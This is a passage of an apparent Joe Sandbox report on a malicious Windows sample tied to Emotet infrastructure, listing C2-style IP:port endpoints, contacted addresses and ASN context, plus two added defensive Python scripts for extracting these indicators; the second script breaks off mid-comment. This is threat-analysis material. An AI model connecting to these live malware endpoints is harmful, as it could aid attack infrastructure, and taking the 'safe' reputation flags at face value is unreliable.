                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80601Isvchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://Passport.NET/STSsvchost.exe, 0000001B.00000003.813605285.00000148F132E000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDsvchost.exe, 0000001B.00000003.1209653226.00000148F0C5A000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://r3.i.lencr.org/0-windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://r3.o.lencr.org0windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://79.172.249.82:443/windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmp, windowdcom.exe, 00000003.00000003.278462097.0000000000BB2000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000001B.00000002.1210270479.00000148F0C8F000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://signup.live.com/signup.aspxsvchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813609882.00000148F1331000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://wellformedweb.org/CommentAPI/svchost.exe, 0000001D.00000002.961089640.0000021C5EF30000.00000002.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://186.103.199.252:4143/windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
URL | Source (process, memory dump) | Malicious | Antivirus detection | Reputation
http://schemas.xmlsoap.org/ws/2004/09/policy | svchost.exe, 0000001B.00000002.1210270479.00000148F0C8F000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmp | false | - | high
http://79.172.249.82:443/3.94.198:4143/ | windowdcom.exe, 00000003.00000002.1276048500.0000000000BF0000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80605 | svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp; svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmp | false | - | high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmp | false | - | high
https://account.live.com/inlinesignup.aspx?iww=1&id=80604 | svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp; svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmp | false | - | high
http://71.244.60.231:4143/AES | windowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000009.00000003.307787079.0000020842045000.00000004.00000001.sdmp | false | - | high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmp | false | - | high
https://activity.windows.comr | svchost.exe, 00000007.00000002.1275929879.000002544DE43000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmp | false | - | high
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue | svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmp; svchost.exe, 0000001B.00000003.823013548.00000148F1332000.00000004.00000001.sdmp | false | - | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmp | false | - | high
https://account.live.com/Wizard/Password/Change?id=80601 | svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp; svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp; svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp; svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp; svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp; svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/02/sc | svchost.exe, 0000001B.00000002.1210610354.00000148F1337000.00000004.00000001.sdmp; svchost.exe, 0000001B.00000003.817546441.00000148F1362000.00000004.00000001.sdmp | false | - | high
https://account.live.com/inlinesignup.aspx?iww=1&id=80601 | svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp | false | - | high
http://80.82.115.164:4143/ | windowdcom.exe, 00000003.00000003.902142006.0000000000BF0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://account.livex | svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80600 | svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp; svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp | false | - | high
http://159.203.94.198:4143/ | windowdcom.exe, 00000003.00000002.1275834541.0000000000B78000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmp | false | - | high

                                                                                                                                                Contacted IPs


                                                                                                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
178.62.39.238 | unknown | European Union | 14061 | DIGITALOCEAN-ASNUS | false
80.86.91.232 | unknown | Germany | 8972 | GD-EMEA-DC-SXB1DE | false
173.230.145.224 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | false
167.114.153.153 | unknown | Canada | 16276 | OVHFR | false
37.187.4.178 | unknown | France | 16276 | OVHFR | false
79.172.249.82 | unknown | Hungary | 43711 | SZERVERNET-HU-ASHU | false
193.169.54.12 | unknown | Germany | 49464 | ICFSYSTEMSDE | false
71.244.60.231 | unknown | United States | 5650 | FRONTIER-FRTRUS | false
159.203.94.198 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | false
80.82.115.164 | unknown | United Kingdom | 41357 | UK-34SP-ASGB | false
186.103.199.252 | unknown | Chile | 15311 | TelefonicaEmpresasCL | false

                                                                                                                                                Private

                                                                                                                                                IP
                                                                                                                                                192.168.2.1
                                                                                                                                                127.0.0.1
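Two things in the tables above deserve a closer look before the IOCs are copied out. The URL-reputation lookups return "safe" for the bare ip:port strings carved from the dropped process, and the Malicious column reads false for every contacted address, including 178.62.39.238, which the Joe Sandbox View section further down ties to a long list of earlier Emotet-named submissions; neither flag clears an address. The memory strings are also imperfect: one of them is two URLs overlapped in memory, so the second endpoint survives only as a tail fragment. The script below is an added example, not code from this report or from Joe Security. It takes the C2-style URL strings and the Contacted IPs rows as constructed lists copied from the tables above, extracts every ip:port token (including truncated fragments, which it resolves by unique suffix match against the contacted addresses), keeps only endpoints the sandbox actually saw traffic to, flags the ones on ports other than 80/443/8080 (the "non-standard ports" signature from the overview), and lists the contacted addresses that no recovered string names. The list of standard ports and the suffix-matching rule are this example's own choices.

```python
"""Extract network IOCs from Joe Sandbox report text (added example).

Constructed from the URL and Contacted IPs tables of the report above; not
part of the report itself. Strings carved from packed malware memory are
often overlapped fragments, so one string may hold more than one endpoint
and one of them may have lost its leading octets.
"""
import ipaddress
import re

# Constructed from the report's URL table (source process column dropped).
MEMORY_URLS = [
    "http://79.172.249.82:443/3.94.198:4143/",   # two URLs overlapped in memory
    "http://71.244.60.231:4143/AES",
    "http://80.82.115.164:4143/",
    "http://159.203.94.198:4143/",
    "https://dev.virtualearth.net/REST/v1/Traffic/Incidents/",  # OS background noise
]

# Constructed from the Contacted IPs table: (ip, country, asn, asn name as printed).
CONTACTED = [
    ("178.62.39.238", "European Union", 14061, "DIGITALOCEAN-ASNUS"),
    ("80.86.91.232", "Germany", 8972, "GD-EMEA-DC-SXB1DE"),
    ("173.230.145.224", "United States", 63949, "LINODE-APLinodeLLCUS"),
    ("167.114.153.153", "Canada", 16276, "OVHFR"),
    ("37.187.4.178", "France", 16276, "OVHFR"),
    ("79.172.249.82", "Hungary", 43711, "SZERVERNET-HU-ASHU"),
    ("193.169.54.12", "Germany", 49464, "ICFSYSTEMSDE"),
    ("71.244.60.231", "United States", 5650, "FRONTIER-FRTRUS"),
    ("159.203.94.198", "United States", 14061, "DIGITALOCEAN-ASNUS"),
    ("80.82.115.164", "United Kingdom", 41357, "UK-34SP-ASGB"),
    ("186.103.199.252", "Chile", 15311, "TelefonicaEmpresasCL"),
]

STANDARD_HTTP_PORTS = {80, 443, 8080}  # assumption: what "standard" means here

# One to four dotted octets followed by a port. Fewer than four octets means
# the string was partly overwritten and only the tail of the address survived.
ENDPOINT_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){0,3}):(\d{1,5})")


def candidate_endpoints(s):
    """All (ip_or_fragment, port) tokens in one memory string, in order."""
    out = []
    for frag, port in ENDPOINT_RE.findall(s):
        port = int(port)
        if frag.count(".") == 3:
            try:
                ipaddress.IPv4Address(frag)  # reject e.g. 999.1.1.1
            except ValueError:
                continue
        if 0 < port < 65536:
            out.append((frag, port))
    return out


def resolve(frag, contacted_ips):
    """Map a token to a contacted IP: exact match for a full address, unique
    suffix match for a truncated fragment. Returns (ip, how) or (None, 'unresolved')."""
    if frag.count(".") == 3:
        return (frag, "exact") if frag in contacted_ips else (None, "unresolved")
    hits = [ip for ip in contacted_ips if ip.endswith(frag)]
    return (hits[0], "suffix") if len(hits) == 1 else (None, "unresolved")


def confirmed_c2(memory_urls, contacted):
    """Endpoints named in memory AND contacted during the run, with ASN data.
    An exact match wins over a suffix match for the same ip:port."""
    info = {ip: (country, asn, name) for ip, country, asn, name in contacted}
    found = {}
    for s in memory_urls:
        for frag, port in candidate_endpoints(s):
            ip, how = resolve(frag, info)
            if ip is None:
                continue
            if (ip, port) not in found or how == "exact":
                found[(ip, port)] = how
    rows = []
    for (ip, port), how in found.items():
        country, asn, name = info[ip]
        rows.append({"ip": ip, "port": port, "country": country, "asn": asn,
                     "asn_name": name, "how": how,
                     "nonstandard_port": port not in STANDARD_HTTP_PORTS})
    rows.sort(key=lambda r: (ipaddress.IPv4Address(r["ip"]), r["port"]))
    return rows


def unreferenced_contacted(memory_urls, contacted):
    """Contacted IPs that no recovered string names: still IOCs, but their
    role (C2, fallback server, or benign) needs the pcap or outside context."""
    named = {r["ip"] for r in confirmed_c2(memory_urls, contacted)}
    return [ip for ip, *_ in contacted if ip not in named]


if __name__ == "__main__":
    for r in confirmed_c2(MEMORY_URLS, CONTACTED):
        flag = "  (non-standard port)" if r["nonstandard_port"] else ""
        print(f"{r['ip']}:{r['port']}  AS{r['asn']} {r['asn_name']}  via {r['how']}{flag}")
    print("contacted but not named in memory:", unreferenced_contacted(MEMORY_URLS, CONTACTED))
```

Run as-is it recovers four confirmed endpoints, three of them on port 4143, and resolves the "3.94.198:4143" fragment to 159.203.94.198 because only one contacted address ends that way; the exact string for the same endpoint later overrides the suffix match. Seven contacted addresses are never named in the recovered strings, which is the usual reason to pull the pcap rather than stop at the memory-string table.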

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                Analysis ID:377029
                                                                                                                                                Start date:28.03.2021
                                                                                                                                                Start time:19:27:41
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 13m 1s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:yxghUyIGb4 (renamed file extension from none to exe)
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:35
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal96.troj.evad.winEXE@17/8@0/13
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                HDC Information:
                                                                                                                                                • Successful, ratio: 42.9% (good quality ratio 39.3%)
                                                                                                                                                • Quality average: 79%
                                                                                                                                                • Quality standard deviation: 30.4%
                                                                                                                                                HCA Information:Failed
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
Warnings:
                                                                                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, wermgr.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, UsoClient.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.50.102.62, 204.79.197.200, 13.107.21.200, 104.43.193.48, 52.255.188.83, 13.88.21.125, 104.43.139.144, 20.82.210.154, 184.30.24.56, 104.42.151.234, 51.103.5.159, 2.20.142.210, 2.20.142.209, 92.122.213.247, 92.122.213.194, 20.190.160.129, 20.190.160.8, 20.190.160.2, 20.190.160.69, 20.190.160.75, 20.190.160.71, 20.190.160.132, 20.190.160.4, 93.184.220.29, 20.54.26.129, 40.126.31.8, 40.126.31.141, 40.126.31.139, 20.190.159.132, 40.126.31.143, 40.126.31.1, 20.190.159.136, 40.126.31.6, 40.127.240.158, 52.137.106.217, 20.49.150.241
                                                                                                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, cs9.wac.phicdn.net, settingsfd-prod-wus21-endpoint.trafficmanager.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, vip1-par02p.wns.notify.trafficmanager.net, wns.notify.trafficmanager.net, ocsp.digicert.com, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, ams2.current.a.prd.aadg.trafficmanager.net
                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

Time | Type | Description
19:28:54 | API Interceptor | 6x Sleep call for process: svchost.exe modified
19:30:09 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                178.62.39.238Dokumente #9679310812.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Invoices Overdue.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Invoices Overdue.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Dokumente vom Notar #33062192.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Dokumente vom Notar #33062192.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Emotet21.02.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Emotet21.02.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
                                                                                                                                                Emotet.docGet hashmaliciousBrowse
                                                                                                                                                • 178.62.39.238:443/
Match | Associated Sample Name / URL | Detection | Context
178.62.39.238 | Emotet.doc | malicious | 178.62.39.238:443/
178.62.39.238 | Document needed.doc | malicious | 178.62.39.238:443/
178.62.39.238 | Document needed.doc | malicious | 178.62.39.238:443/
178.62.39.238 | Question.doc | malicious | 178.62.39.238:443/
178.62.39.238 | Question.doc | malicious | 178.62.39.238:443/
178.62.39.238 | http://ardri-lubrication.com/Question/ | malicious | 178.62.39.238:443/
178.62.39.238 | newemotet.doc | malicious | 178.62.39.238:443/
178.62.39.238 | newemotet.doc | malicious | 178.62.39.238:443/
178.62.39.238 | http://ardri-lubrication.com/Question/ | malicious | 178.62.39.238:443/
178.62.39.238 | Rechnung49915.doc | malicious | 178.62.39.238:443/
178.62.39.238 | Rechnung49915.doc | malicious | 178.62.39.238:443/
178.62.39.238 | Emotet20.02.18A.doc | malicious | 178.62.39.238:443/
80.86.91.232 | Invoice.doc | malicious | 80.86.91.232:4143/
80.86.91.232 | Overdue payment.doc | malicious | 80.86.91.232:4143/
80.86.91.232 | Emotet.doc | malicious | 80.86.91.232:4143/
80.86.91.232 | Outstanding Invoices.doc | malicious | 80.86.91.232:4143/
80.86.91.232 | Outstanding Invoices.doc | malicious | 80.86.91.232:4143/
80.86.91.232 | Emote.exe | malicious | 80.86.91.232:4143/
80.86.91.232 | Question.doc | malicious | 80.86.91.232:4143/
80.86.91.232 | emotet.doc | malicious | 80.86.91.232:4143/
80.86.91.232 | Paypal.doc | malicious | 80.86.91.232:4143/
80.86.91.232 | Paypal.doc | malicious | 80.86.91.232:4143/
80.86.91.232 | emotet.doc | malicious | 80.86.91.232:4143/
80.86.91.232 | emotet.doc | malicious | 80.86.91.232:4143/
80.86.91.232 | 960-27-621120-257 & 960-27-621120-969.doc | malicious | 80.86.91.232:4143/
80.86.91.232 | Rechnung.doc | malicious | 80.86.91.232:4143/
80.86.91.232 | Open invoices.doc | malicious | 80.86.91.232:4143/
80.86.91.232 | 20180212-20_46_01_.doc | malicious | 80.86.91.232:7080/
80.86.91.232 | SalesInvoice.doc | malicious | 80.86.91.232:7080/
80.86.91.232 | SalesInvoice.doc | malicious | 80.86.91.232:7080/
80.86.91.232 | mj03dyvx_2076767.exe | malicious | 80.86.91.232:7080/
80.86.91.232 | Scan1782384.doc | malicious | 80.86.91.232:7080/

Domains

No context

ASN

Match | Associated Sample Name / URL | Detection | Context
GD-EMEA-DC-SXB1, DE | TaTYytHaBk.exe | malicious | 85.25.43.31
GD-EMEA-DC-SXB1, DE | 8X93Tzvd7V.exe | malicious | 217.172.179.54
GD-EMEA-DC-SXB1, DE | u8A8Qy5S7O.exe | malicious | 217.172.179.54
GD-EMEA-DC-SXB1, DE | SecuriteInfo.com.Mal.GandCrypt-A.24654.exe | malicious | 217.172.179.54
GD-EMEA-DC-SXB1, DE | SecuriteInfo.com.Mal.GandCrypt-A.5674.exe | malicious | 217.172.179.54
GD-EMEA-DC-SXB1, DE | csrss.bin.exe | malicious | 188.138.33.233
GD-EMEA-DC-SXB1, DE | yx8DBT3r5r.exe | malicious | 92.51.129.66
GD-EMEA-DC-SXB1, DE | E00636067E.exe | malicious | 85.25.177.199
GD-EMEA-DC-SXB1, DE | http___contributeindustry.com_js_engine-rawbin.exe | malicious | 85.25.177.199
GD-EMEA-DC-SXB1, DE | z2xQEFs54b.exe | malicious | 87.230.93.218
GD-EMEA-DC-SXB1, DE | M9j9PKzG99.dll | malicious | 62.75.168.152
GD-EMEA-DC-SXB1, DE | u9q6OemjX5.dll | malicious | 62.75.168.152
GD-EMEA-DC-SXB1, DE | Iy5GlyAujZ.dll | malicious | 62.75.168.152
GD-EMEA-DC-SXB1, DE | DPLhVm07M0.dll | malicious | 62.75.168.152
GD-EMEA-DC-SXB1, DE | KMD9GwwC1a.dll | malicious | 62.75.168.152
GD-EMEA-DC-SXB1, DE | T6c9JZgNiz.dll | malicious | 62.75.168.152
GD-EMEA-DC-SXB1, DE | HHCCEzq4Kv.dll | malicious | 62.75.168.152
GD-EMEA-DC-SXB1, DE | W8bfp4WrpK.dll | malicious | 62.75.168.152
GD-EMEA-DC-SXB1, DE | C3kvRroXyY.dll | malicious | 62.75.168.152
GD-EMEA-DC-SXB1, DE | hOpCAW8ZmJ.dll | malicious | 62.75.168.152
DIGITALOCEAN-ASN, US | SecuriteInfo.com.Variant.Bulz.385171.11582.exe | malicious | 138.197.53.157
DIGITALOCEAN-ASN, US | SecuriteInfo.com.Adware.WizzMonetize.1.3832.exe | malicious | 138.197.53.157
DIGITALOCEAN-ASN, US | 987ecd3efd6f143e1e63bf3cff337224d2131be4a21a6.exe | malicious | 206.189.90.152
DIGITALOCEAN-ASN, US | 4FNTlzlu10.exe | malicious | 5.101.110.225
DIGITALOCEAN-ASN, US | SecuriteInfo.com.Trojan.Siggen12.58144.411.exe | malicious | 5.101.110.225
DIGITALOCEAN-ASN, US | 7Q1bVVkIIL.exe | malicious | 5.101.110.225
DIGITALOCEAN-ASN, US | ps_script.ps1 | malicious | 159.65.89.222
DIGITALOCEAN-ASN, US | csrss.bin.exe | malicious | 46.101.183.160
DIGITALOCEAN-ASN, US | R2o3eEx5Zj.exe | malicious | 5.101.110.225
DIGITALOCEAN-ASN, US | document-1767706363.xlsm | malicious | 159.203.6.250
DIGITALOCEAN-ASN, US | Kiod.dll | malicious | 178.128.243.14
DIGITALOCEAN-ASN, US | aEdlObiYav.exe | malicious | 104.236.246.93
DIGITALOCEAN-ASN, US | ajESKcIz8f.exe | malicious | 138.197.53.157
DIGITALOCEAN-ASN, US | Revised Signed Proforma Invoice 000856453553.exe | malicious | 134.209.159.22
DIGITALOCEAN-ASN, US | rona.exe | malicious | 104.248.117.19
DIGITALOCEAN-ASN, US | fDFkIEBfpm.exe | malicious | 206.189.174.29
DIGITALOCEAN-ASN, US | JE74.vbs | malicious | 104.248.193.149
DIGITALOCEAN-ASN, US | 4d86320858effdc2c8bf3fc2ae86080f0f6b449141991.dll | malicious | 167.172.240.248
DIGITALOCEAN-ASN, US | Rc93GKN1MJ.exe | malicious | 138.197.161.207
DIGITALOCEAN-ASN, US | tBU1h89Elf.dll | malicious | 167.172.240.248
LINODE-AP Linode LLC, US | TaTYytHaBk.exe | malicious | 45.33.51.71
LINODE-AP Linode LLC, US | 0HvIGwMmBV.exe | malicious | 173.230.145.224
LINODE-AP Linode LLC, US | pitEBNziGR.exe | malicious | 173.230.145.224
LINODE-AP Linode LLC, US | aEdlObiYav.exe | malicious | 45.33.54.74
LINODE-AP Linode LLC, US | 1m7388e48E.exe | malicious | 45.79.26.231
LINODE-AP Linode LLC, US | 4849708PO # RMS0001.exe | malicious | 45.79.19.196
LINODE-AP Linode LLC, US | SecuriteInfo.com.Trojan.Kronos.21.31435.exe | malicious | 139.162.210.252
LINODE-AP Linode LLC, US | Z8bln2YPEw.exe | malicious | 96.126.101.20
LINODE-AP Linode LLC, US | yxQWzvifFe.exe | malicious | 96.126.123.244
LINODE-AP Linode LLC, US | Purchase _Order-EndUer#99849959.Pdff.exe | malicious | 139.162.21.249
LINODE-AP Linode LLC, US | Private document.docm | malicious | 139.162.187.154
LINODE-AP Linode LLC, US | p.o_015299.exe | malicious | 104.237.142.196
LINODE-AP Linode LLC, US | p.o_015299.exe | malicious | 104.237.142.196
LINODE-AP Linode LLC, US | 2ojdmC51As.exe | malicious | 172.104.97.173
LINODE-AP Linode LLC, US | po#521.exe | malicious | 104.237.142.196
LINODE-AP Linode LLC, US | GBv66BGS05.exe | malicious | 45.79.222.138
LINODE-AP Linode LLC, US | unpacked.exe | malicious | 172.104.179.220
LINODE-AP Linode LLC, US | E-CONTACT_FORM.html | malicious | 74.207.250.131
LINODE-AP Linode LLC, US | page.exe | malicious | 172.104.225.210
LINODE-AP Linode LLC, US | page.exe | malicious | 172.104.225.210
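The IP:port contexts listed above and the JA3 client fingerprint context this report also records are the pivots a responder would hunt on. The following is an added example, not part of the sandbox report or its vendor's tooling: it parses rows in the flattened "Match / Sample / Detection / Context" form this extraction uses, turns them into IOC sets, and scores constructed Zeek-style ssl.log lines against them. The log lines, the benign destination 93.184.216.34, the all-'a' placeholder JA3 and the assumed field order (ts, uid, id.orig_h, id.orig_p, id.resp_h, id.resp_p, ja3) are all constructed for illustration; the IOC values are the ones the report shows.

```python
import re
from typing import List, Set, Tuple

# Constructed input: rows copied in the flattened form the extracted report uses.
# The "Match" cell is fused to the sample name and the context sits on a bullet line;
# "Get hash" and "Browse" are link residue and carry no data.
IP_CONTEXT_RAW = """
80.86.91.232Invoice.docGet hashmaliciousBrowse
• 80.86.91.232:4143/
SalesInvoice.docGet hashmaliciousBrowse
• 80.86.91.232:7080/
Emotet.docGet hashmaliciousBrowse
• 178.62.39.238:443/
"""
JA3_CONTEXT_RAW = """
51c64c77e60f3980eea90869b68c58a8cEZGHOTI9M.dllGet hashmaliciousBrowse
• 167.114.153.153
"""

ROW_RE = re.compile(r"^(?P<cell>.+?)Get hash(?P<verdict>[a-z]+)Browse$")
IP_PORT_RE = re.compile(r"^•\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})/?$")
JA3_RE = re.compile(r"^[0-9a-f]{32}")


def parse_ip_contexts(raw: str) -> Set[Tuple[str, int]]:
    """Collect (ip, port) pairs from the context bullets of the IP table."""
    found = set()
    for line in raw.strip().splitlines():
        m = IP_PORT_RE.match(line.strip())
        if m:
            found.add((m.group(1), int(m.group(2))))
    return found


def parse_ja3_matches(raw: str) -> Set[str]:
    """Collect JA3 hashes from the Match cell of the JA3 table.

    The cell is fused with the sample name, so only the leading 32 hex
    characters are taken; this is only safe inside the JA3 section, where
    every Match cell starts with a JA3 hash."""
    found = set()
    for line in raw.strip().splitlines():
        row = ROW_RE.match(line.strip())
        if row:
            j = JA3_RE.match(row.group("cell"))
            if j:
                found.add(j.group(0))
    return found


# Constructed Zeek-style ssl.log excerpt (tab-separated, assumed field order):
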